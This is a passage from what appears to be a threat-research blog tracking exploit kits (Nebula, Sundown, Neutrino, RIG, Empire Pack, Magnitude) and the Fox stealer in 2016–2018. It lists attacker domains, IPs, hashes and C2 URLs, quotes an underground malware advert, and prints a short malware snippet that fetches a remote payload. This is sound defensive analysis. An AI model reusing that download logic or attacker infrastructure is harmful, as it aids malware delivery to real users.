traffic illustrated in the advert thread is quite inline with the one captured in France).So I was naming that variation: Sundown-N. Intel shared by Frank Ruiz (FoxIT) on the 21st allowed me to know for sure this traffic was indeed Nebula.The following days i saw other actor sending traffic to this EK.Taxonomy tied to Nebula Activity in MISP - 2017-03-02Taxonomy tied to GamiNook traffic activity, EK and resulting payloadToday URI pattern changed from this morning :/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM/?yXy3HX2F=tCu_Mj322aEBSXjYhatLoVmBgZJh_0Fg_wX_zQYxIg6nksDowOciFzNB/?yXzbGV2jkcB_eU8=4ya6MDz31KdQTi7ahapLolnWjJdj_EJt-VT4mwQxIQ6gksTllrB3EGRM/?ykjaKniEk6ZhH1-P=si-8YGj_1aANTynfh6Ye81mHhZE0_RNs_gn5nAExcV6okpTknOQgEmNN/?z0vDa0iBu-Q=tHnqNT_-1KcGGCzfhqVKoVmB08dm_BJt-QKumQEwJA2nksGyk-QhQDRA/?z13qMVqqoKRvTw=5S--Y2uk0apQGiyOhvdI81nQhZMwqxVo9FSsmVAyIgiokpPnl-V0QDIf/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksTllrB3EGRM/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksW2w7QsRTIf/?zWnBFniM=4Ca9Zjej0PRTGC3e06FJp1nVjJA1rBRpqleumABkJF2hksTllrB3EGRM/?zn3iKU_xjeNxWw=sHu7MTry2aoAFCyKgKUY8FmF0ZZi_kFg9ASimVQ2cl-lksTllrB3EGRM/?zy3jN0Gvi9RjY02F2g=4H27Yjn-0_EBHSrc26MfoVnV15Yx-hJqrwWrnwJjcVqnkpTknOQgEmNN(which is Sundown/Beps without the index.php) to/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU/507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1/2003/01/27/exchange-monday-wilderness/46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c/5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7/2006/08/05/fur-copper-shark/48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7/tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h/ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi/aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1/2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361/615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20/2012/04/22/present-measure-physical-examination(for those who would like to build their regexp, more pattern available here : )2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02This landing pattern change triggered the publication of this post. Nebula might end up not being a "vapor" EK but let's wait and see. The only difference with Sundown till today was its internal TDS.Exploits: CVE-2014-6332 + CVE-2015-0016CVE-2013-2551CVE-2016-0189 godmodeCVE-2015-8651CVE-2015-7645CVE-2016-4117Files:  Nebula_2017-03-02 (2 fiddler - password is malware)Acknowledgement :Thanks Joseph C Chen and Brooks Li (Trendmicro),  Frank Ruiz (Fox-IT InTELL) and Andrew Komarov ( InfoArmor Inc. ) for the help on different aspect of this post.Edit:2017-03-03 Corrected some CVE id + not all payload are in clear---Some IOCsDateSha256Comment2017/02/17f4627005c018071f8ec6b084eef3936e3a267660b0df99ffa0d27a8d943d1af5Flash Exploit (CVE-2016-4117)2017/02/27be86dc88e6337f09999991c206f890e0d52959d41f2bb4c6515b5442b23f2eccFlash Exploit (CVE-2016-4117)2017/02/1767d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6Flash Exploit (CVE-2015-7645 Sample seen previously in Sundown)2017/02/1704fb00bdd3d2c0667b18402323fe7cf495ace5e35a4562e1a30e14b26384f41cFlash Exploit (CVE-2015-8651 Sample seen previously in Sundown)2017/02/17b976cf6fd583b349e51cb34b73de6ef3a5ee72f86849f847b9158b4a7fb2315cPitou2017/02/176fe13d913f4d3f2286f67fbde08ab17418ba8370410e52354ffa12a0aaf498f8Gootkit2017/02/221a22211d01d2e8746efe0d14ab7e1e547c3e30863a83e0884a9d90325bd7b64bRamnit2017/03/026764f98ba6509b3351ad2f960dcc47c27d0dc00d53d7e0ae132a7c1d15067f4aDiamondFoxDateDomainIPComment2017/02/17tci.nhnph.com188.209.49.135Nebula Payload Domain2017/02/22gnd.lplwp.com188.209.49.135Nebula Payload Domain2017/02/24qcl.ylk8.xyz188.209.49.23Nebula Payload Domain2017/02/28hmn.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/03/02qgg.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/02/17agendawedge.shoemakerzippersuccess.stream188.209.49.135Nebula2017/02/17clausmessage.nationweekretailer.club217.23.7.15Nebula2017/02/17equipmentparticle.shockadvantagewilderness.club217.23.7.15Nebula2017/02/17salaryfang.shockadvantagewilderness.club217.23.7.15Nebula2017/02/22deficitshoulder.lossicedeficit.pw188.209.49.135Nebula2017/02/22distributionjaw.hockeyopiniondust.club188.209.49.135Nebula2017/02/22explanationlier.asiadeliveryarmenian.pro188.209.49.135Nebula2017/02/23cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/23instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23soldierprice.distributionstatementdiploma.site188.209.49.135Nebula2017/02/23swissfacilities.gumimprovementitalian.stream188.209.49.135Nebula2017/02/23transportdrill.facilitiesturkishdipstick.info188.209.49.135Nebula2017/02/24authorisationmessage.casdfble.stream188.209.49.151Nebula2017/02/24cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24departmentant.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24disadvantageproduction.brassreductionquill.site188.209.49.151Nebula2017/02/24disadvantageproduction.casdfble.stream188.209.49.151Nebula2017/02/24europin.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24hygienicreduction.brassreductionquill.site188.209.49.151Nebula2017/02/24hygienicreduction.casdfble.stream188.209.49.151Nebula2017/02/24instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24jobhate.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24limitsphere.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24printeroutput.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24redrepairs.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24soldierprice.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24suggestionburn.distributionstatementdiploma.site188.209.49.151Nebula2017/02/25advertiselaura.bubblecomparisonwar.top188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.151Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/25apologycold.shearssuccessberry.club188.209.49.151Nebula2017/02/25authorizationmale.foundationspadeinventory.club188.209.49.151Nebula2017/02/25birthdayexperience.foundationspadeinventory.club188.209.49.151Nebula2017/02/25confirmationaustralian.retaileraugustplier.club188.209.49.151Nebula2017/02/25dancerretailer.shearssuccessberry.club188.209.49.151Nebula2017/02/25employergoods.deliverycutadvantage.info188.209.49.151Nebula2017/02/25fallhippopotamus.deliverycutadvantage.info188.209.49.151Nebula2017/02/25goallicense.shearssuccessberry.club188.209.49.151Nebula2017/02/25goalpanda.retaileraugustplier.club188.209.49.151Nebula2017/02/25holidayagenda.retaileraugustplier.club188.209.49.151Nebula2017/02/25marketsunday.deliverycutadvantage.info188.209.49.151Nebula2017/02/25penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25purposeguarantee.shearssuccessberry.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.49Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/25rollinterest.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.49Nebula2017/02/26advantagelamp.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/26budgetdegree.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26competitionseason.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26customergazelle.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26decembercommission.divingfuelsalary.trade93.190.141.200Nebula2017/02/26distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/26equipmentwitness.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26invoiceburst.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/26jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/26rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/26startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/27approveriver.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/27invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/27jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/27lipprice.edgetaxprice.site93.190.141.45Nebula2017/02/27marginswiss.divingfuelsalary.trade93.190.141.200Nebula2017/02/27outputfruit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/27reindeerprofit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27reminderdonna.divingfuelsalary.trade93.190.141.200Nebula2017/02/27startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27supplyheaven.gramsunshinesupply.club93.190.141.39Nebula2017/02/27transportbomb.gramsunshinesupply.club93.190.141.39Nebula2017/02/28afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/28agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/02/28bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28certificationplanet.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28chooseravioli.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28coachadvantage.reportattackconifer.site93.190.141.39Nebula2017/02/28databasesilver.reportattackconifer.site93.190.141.39Nebula2017/02/28date-of-birthtrout.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28dependentswhorl.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28derpenquiry.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28domainconsider.mxkznekruoays.trade93.190.141.200Nebula2017/03/01agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/03/01bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02actressheight.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02applywholesaler.tboapfmsyu.stream93.190.141.200Nebula2017/03/02approvepeak.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02borrowfield.77e1084e.pro93.190.141.45Nebula2017/03/02boydescription.356020817786fb76e9361441800132c9.win93.190.141.39Nebula2017/03/02buglecommand.textfatherfont.info93.190.141.39Nebula2017/03/02buysummer.77e1084e.pro93.190.141.45Nebula2017/03/02captaincertification.77e1084e.pro93.190.141.45Nebula2017/03/02chargerule.textfatherfont.info93.190.141.39Nebula2017/03/02cityacoustic.textfatherfont.info93.190.141.39Nebula2017/03/02clickbarber.356020817786fb76e9361441800132c9.win93.190.141.39Nebula

CVE-2016-7200 & CVE-2016-7201 (Edge) and Exploit Kits

Wednesday March 8th, 2017 11:34:37 AM
CVE-2016-7200 & CVE-2016-7201 are vulnerabilities in the Chakra JavaScript scripting engine in Microsoft Edge. Reported by Natalie Silvanovich of Google Project Zero, those have been fixed  in november 2016 (MS16-129) by Microsoft.Note : No successful exploitation seen despite integration tries.On 2017-01-04 @theori_io released a POCProof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —— Theori (@theori_io) 4 janvier 2017providing again (cf CVE-2016-0189) ready-to-use code to Exploit Kit maintainer.After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.[edit : 2017-01-10]​I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there.[/edit]Sundown:2017-01-06Sundown EK firing CVE-2016-7200/7201 to Edge 2017-01-06No exploitation here thoughFiddler: (password is malware)Out of topic: expected payload in that infection chain was zloader. (other payload seen in past weeks dropped via Sundown : Zeus Panda, Neutrino Bot, Dreambot, Chthonic, Andromeda, Smokebot, Betabot, Remcos, IAP, RTM, Kronos, Bitcoin Miner)Neutrino:2017-01-14--Thanks to Trendmicro for the multiple inputs that allowed me to keep plugged to this infection chain.--So as explained previously Neutrino is now in full private mode and fueled via Malvertising bought to several ad agencies (e.g. ZeroPark, ClickAdu, PropellerAds, HillTopAds) by a Traffer actor which I tag as NeutrAds. Their infection chain is now accepting/redirecting Microsoft Edge Browser as well.Without big surprise a new exploit is included in the Flash bundle : nw27 >  CVE-2016-7200/7201.NeutrAds redirect is now  accepting Edge traffic - 2017-01-14Neutrino Embedding CVE-2016-7200/7201 - 2017-01-14(Neutrino-v flash ran into Maciej ‘s Neutrino decoder )Extracted CVE-2016-7200/7201  elements - 2017-01-14Note: i did not get infection with- Edge 25.10586.0.0 / EdgeHTML 13.10586- Edge 20.10240.16384.0Fiddler&Pcap :  (Password is malware)Extracted exploits: (Password is malware)reveiled[.space| - NeutrAds Filtering Redirectorvfwdgpx.amentionq[.win| - Neutrino Payload in that pass : Gootkit - b5567655caabb75af68f6ea33c7a22dbc1a6006ca427da6be0066c093f592610Associated C2 :buyyou[.org |[.comfastfuriedts[.org monobrosexeld[.orgSo those days, in Asia you'll most probably get Cerber and in EU/NA you'll most probably get GootkitMISP : taxonomy illustrating some NeutrAds into Neutrino-v recorded activity (and post infection)Kaixin:2017-01-15 Finding by Simon ChoiCVE-2016-7200/7201 code fired by Kaixin - 2017-01-16Fiddler : (Password is malware)Out of topic: payload in another pass (not fired by this exploit) was Blackmoon/Banbra 6c919213b5318cdb60d67a4b4ace709dfb7e544982c0e101c8526eff067c8332Callback:http://r.pengyou[.com/fcg-bin/cgi_get_portrait.fcg?uins=1145265195http://67.198.186[.254/ca.php?m=525441744D5441744D6A63744E3055744D554D745130493D&h=437Edits:2016-11-10 - Adding information about mitigation on Edge2016-11-14 - Adding Neutrino2016-11-16 - Fixed the screenshot for Neutrino. Was stating CVE-2016-4117 was there. It's not2016-11-16 - Adding KaixinRead More:Three roads lead to Rome - Qihoo360 - 2016-11-29Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) - Theori-io - 2017-01-04

RIG evolves, Neutrino waves goodbye, Empire Pack appears

Monday December 5th, 2016 03:32:30 PM
  Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware. Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016RIG += internal TDS :Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me) Picture2: Blackhole - 2012 - Internal TDS illustrationbut disappeared from the market with the end of Nuclear Pack Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustrationand Angler EK Picture 4 : Angler EK - Internal TDS illustrationThis is a key feature for load seller. It is making their day to day work with traffic provider far easier . It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country). Picture 5: A Sutra TDS in action in 2012 - cf The path to infection RIG += RC4 encryption, dll drop and CVE-2016-0189:Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189 Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.Neutrino waves goodbye ?On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :“we are closed. no new rents, no extends more”This explains a lot. Here are some of my last Neutrino pass for past month. Picture 8: Some Neutrino passes for past month and associated taxonomy tags in MispAs you can see several actors were still using it…Now here is what i get for the past days : Picture 9: Past days in DriveBy land Not shown here, Magnitude is still around, mostly striking in AsiaDay after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground. Picture 10: Last banner for Neutrino as of 2016-09-16Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.Side reminder : Neutrino disappeared from march 2014 till november 2014A Neutrino VariantSeveral weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino. Picture 11: Neutrino-v pass on the 2016-09-21Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder Note the pnw26 with no associated binary data, the rubbish and additionalInfoA Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523 Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api function k2(k) { var y = a(e + "." + e + "Request.5.1"); y.setProxy(n);"GET", k(1), n); y.Option(n) = k(2); y.send(); if (200 == y.status) return Rf(y.responseText, k(n)) };Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it) Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079xThe actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.Empire Pack:Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised. Picture 15: King of Loads - Empire Pack PanelSome might feel this interface quite familiar…A look a the favicon will give you a hint Picture 16: RIG EK favicon on Empire Pack panel Picture 17: RIG PanelIt seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.[Speculation] I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections. [/Speculation]RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIGapi.php : historical RIG api3.php : RIG with internal TDS [ 2016-10-08 :  This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]remote_api.php : RIG-vBut Empire Pack might be api3, remote_api, or a bit of both of them.By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there.   :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing) ConclusionLet’s just conclude this post with statistics pages of two Neutrino threads Picture 18: Neutrino stats - Aus focused thread - 2016-07-15Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09“We will be known forever by the tracks we leave”Santee Sioux TribeSome IOCsDateDomainIPComment2016-10-01szsiul.bluekill[.]top137.74.55.6Neutrino-v2016-10-01twqivrisa.pinkargue[.]top137.74.55.7Neutrino-v2016-10-01u0e1.wzpub4q7q[.]top185.117.73.80RIG-E (Empire Pack)2016-10-01adspixel[.]site45.63.100.224NeutrAds Redirector2016-09-30re.flighteducationfinancecompany[.]com109.234.37.218RIG-v2016-09-28add.alislameyah[.]org193.124.117.13RIG-v2016-09-28lovesdeals[.]ml198.199.124.116RIG-v2016-09-27dns.helicopterdog[.]com195.133.201.23RIG2016-09-26sv.flickscoop[.]net195.133.201.41RIG2016-09-26red.truewestcarpetcare[.]com195.133.201.11RIG-v2016-09-26oitutn.yellowcarry[.]top78.46.167.130NeutrinoAcknowledgementsThanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.Edits2016-10-03 :Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.Added explanation about the IP whitelisting on RIG API (it was not clear)2016-10-08 :Updated with gained information on Empire Pack2016-11-01 :RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4. panelThe only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)RIG-E Behavioral2016-12-03RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.2016-12-03 RIG-v Pre-landingRead MoreRIG’s Facelift - 2016-09-30 - SpiderLabs Is it the End of Angler ? - 2016-06-11 Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01 Hello Neutrino ! - 2013-06-07The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05

Fox stealer: another Pony Fork

Tuesday November 29th, 2016 02:25:59 PM
Gift for SweetTail-Fox-mlp by Mad-N-MonstrousSmall data drop about another Pony fork : Fox stealer.First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.Advert :2016-08-11 - Sold underground by a user going with nickname "Cronbot"--------Стилер паролей и нетолько - Fox v1.0Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.О продукте : 1. Умеет все что умеет пони. + добавлен новый софт.2. Актуален на 2016 год.3. Написан на С++ без дополнительных библиотек.4. Админка от пони.Условия : 1. Только аренда.2. Распространяется в виде EXE и DLL.3. Исходники продавать не будем.Аренда 250$ в месяц.Исходники 2000$ разово.----Translated by Jack Urban : ----Password stealer and more - Fox v.1.0We are releasing the product for general sale. Final stage of testing for this product is already underway.About the product:1. Is able to do everything that pony does. + new software has been added.2. Relevant for 2016.3. Written in C++ without additional libraries.4. Admin from pony.Conditions:1. For rent only.2. Distributed as an EXE and DLL.3. We will not be selling the source.Rent is $250 a month.Originals are a 2000$ one time fee. --------It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .MISP taxonomy tags reflecting ScriptJS activity in the last months(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2Fox stealer (PonyForx) fingerprint in CuckooSample :cca1f8ba0be872ec86755e3defbb23c8fe4a272a6b4f7ec651302c5cddc5e183Associated C2:blognetoo[.]com/find.php/helloblognetoo[.]com/find.php/datablognetoo[.]com|[.]com| by ET rule :2821590 || ETPRO TROJAN Win32.Pony Variant Checkin[1] ScriptJS's Pony :master.districtpomade[.]com| - 2015-08-15 Pony C2 from ScriptJS​js.travelany[.]com[.]ve| - 2015-12-10 Pony C2 from ScriptJSRead More : few bits about ScriptJSInside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27Pony 1.9 (Win32/Fareit) - 2013-05-23 - Xylitol

CVE-2016-0189 (Internet Explorer) and Exploit Kit

Wednesday January 31st, 2018 01:59:11 PM
Spotted by Symantec in the wild  patched with MS16-051 in may 2016, CVE-2016-0189 is now being integrated in Exploit Kit.Neutrino Exploit Kit :Here 2016-07-13 but i am being told that i am late to the party.It's already [CN] documented hereNeutrino after ScriptJS redirector dropping Locky Affid 13- 2016-07-13Flash sample in that pass : 85b707cf63abc0f8cfe027153031e853fe452ed02034b792323eecd3bc0f7fd(Out of topic payload : 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18 - Locky Affid 13 ) Thanks to Malc0de for invaluable help here :)Files Here: Neutrino_CVE-2016-0189_160714 (Password is malware - VT Link)Sundown :Some evidence of CVE-2016-0189 being integrated in Sundown were spotted on jul 15 by @criznashOn the 16th I recorded a pass where the CVE-2016-0189 had his own calls :Sundown exploiting CVE-2016-0189 to drop Smokebot on the 2016-07-16(Out of topic payload :  61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1 beaconing to : | )Files : Sundown_CVE-2016-0189_160716 (password is malware)RIG:I saw it on 2016-09-12 but might have appeared before.RIG successfully exploiting CVE-2016-0189 - 2016-09-12CVE-2016-0189 from RIG after 3 step decoding passFiles : RIG_2016-0189_2016-09-12 (password is malware)Magnitude:Here pass from 2016-09-16 but is inside since at least 2016-09-04 (Source : Trendmicro - Thanks)CVE-2016-0189 in Magnitude on 2016-09-16Sorry i can't share fiddler publicly in that case (Those specific one would give to attack side too much information about some of the technics that can be used - You know how to contact me)Out of topic Payload:  Cerbera0d9ad48459933348fc301d8479580f85298ca5e9933bd20e051b81371942b2cGrandSoft:Spotted first on 2017-09-22 here is traffic from 2018-01-30 on : Win10 Build 10240 - IE11.0.10240.16431 - KB3078071CVE-2016-0189 in GrandSoft on 2018-01-30Out of topic Payload:  GandCrab Ransomwarea15c48c74a47e81c1c8b26073be58c64f7ff58717694d60b0b5498274e5d9243Fiddler here : (pass is malware) Edits :2016-07-15 a previous version was stating CVE-2015-5122 for nw23. Fixed thanks to @dnpushme2016-07-20 Adding Sundown.2016-09-17 Adding RIG2016-09-19 Adding Magnitude2018-01-30 Adding GrandSoft (but appeared there on 2017-09-22)Read More :[CN] NeutrinoEK来袭:爱拍网遭敲诈者病毒挂马 2016-07-14 - Qihoo360Patch Analysis of CVE-2016-0189 - 2016-06-22 - TheoriInternet Explorer zero-day exploit used in targeted attacks in South Korea - 2016-05-10 - SymantecNeutrino EK: fingerprinting in a Flash - 2016-06-28 - MalwarebytesPost publication Reading :Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release - 2016-07-14 - FireEye

Is it the End of Angler ?

Tuesday August 30th, 2016 02:05:23 PM
Everyone looking at the DriveBy landscape is seeing the same : as Nuclear disappeared around April 30th,  Angler EK has totally vanished on June 7th. We were first thinking about Vacation as in January 2016 or maybe Infrastructure move. But something else is going on.---On the Week-End of the 4-5th of June I noticed that the ongoing malvertising from SadClowns was redirecting to Neutrino Exploit Kit (dropping Cerber)EngageBDR malvertising redirecting to SadClowns infra pushing traffic to Neutrino to Drop Cerber RansomwareOn the 6th I noticed several group migrating to RIG, Neutrino or even Sundown.But I got speechless when I noticed that GooNky had switched to Neutrino to spread their CryptXXX U000001 and U000006.They were sticking exclusively to Angler EK since years and their vacation were synchronized with Angler's in January.Checking all known to me infection path I could hardly find some Angler....last one were behind the EItest infection chain on the night of the 6th to 7th of June.Last Angler pass I captured on 2016-06-07EITest into Angler dropping CryptXXX 3.200 U000017On June 7th around 5:30 AM GMT my tracker recorded its last Angler hit :Last Hit in my Angler tracker.After that...RIG, Neutrino instead of Angler almost everywhere.[Side note: Magnitude 